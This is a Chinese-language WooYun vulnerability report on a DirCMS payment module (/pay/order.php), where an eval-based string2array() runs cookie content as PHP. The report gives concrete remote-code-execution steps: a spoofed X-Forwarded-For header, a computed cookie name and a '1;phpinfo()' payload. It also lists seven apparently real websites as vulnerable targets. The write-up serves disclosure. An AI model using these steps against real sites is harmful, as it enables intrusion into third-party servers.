乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-24: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-06-08: 厂商已经主动忽略漏洞,细节向公众公开
rt
看到/include/global.func.php
function string2array($str){ if(disablefunc('eval'))exit('函数eval被禁用,可能无法正常使用本系统!'); if($str=='') return array(); if(is_array($str))return $str; @eval("\$array = $str;"); return $array;}
这个函数可能会造成任意代码执行,然后看看哪里调用了这个函数然后看到/pay/order.php
include substr(dirname(__FILE__),0,-3).'include/common.inc.php';if($module->module_disabled('pay')){ show404('该模块已被管理员禁用!');}include DIRCMS_ROOT.'pay/include/global.func.php';include DIRCMS_ROOT.'pay/include/pay.class.php';$payobj=new pay();$action=isset($action)?$action:'step1';session_start();$cookiekey=dircms_md5('productarray'.IP);$productarray=string2array(get_cookie($cookiekey));
然后跟进dircms_md5
function dircms_md5($str){ return substr(md5($str),8,16);}
其中ip为可控的
function getIp(){ $ip='未知IP'; if(!empty($_SERVER['HTTP_CLIENT_IP'])) { return is_ip($_SERVER['HTTP_CLIENT_IP'])?$_SERVER['HTTP_CLIENT_IP']:$ip; } elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { return is_ip($_SERVER['HTTP_X_FORWARDED_FOR'])?$_SERVER['HTTP_X_FORWARDED_FOR']:$ip; } else { return is_ip($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:$ip; }}
可以通过xxf伪造,然后就可以造成任意代码执行了。首先找个站点
http://www.qzdszx.net
首先访问
http://www.qzdszx.net/pay/order.php?action=step1
获得cookie前缀
LadfOyQtuF
,然后设置xff为0.0.0.0构造cookie名为
LadfOyQtuFb98b87d11653f2da
,内容为
1;phpinfo()
然后刷新
代码成功执行。
案例
http://www.qzdszx.net/pay/order.php
http://www.cnbonds.com/pay/order.php
http://www.99lao.com/pay/order.php
http://www.tywcn.com/pay/order.php
http://www.0351mh.com/pay/order.php
http://www.0314chengde.com/pay/order.php
http://www.wusumenhu.com/pay/order.php
你们专业
未能联系到厂商或者厂商积极拒绝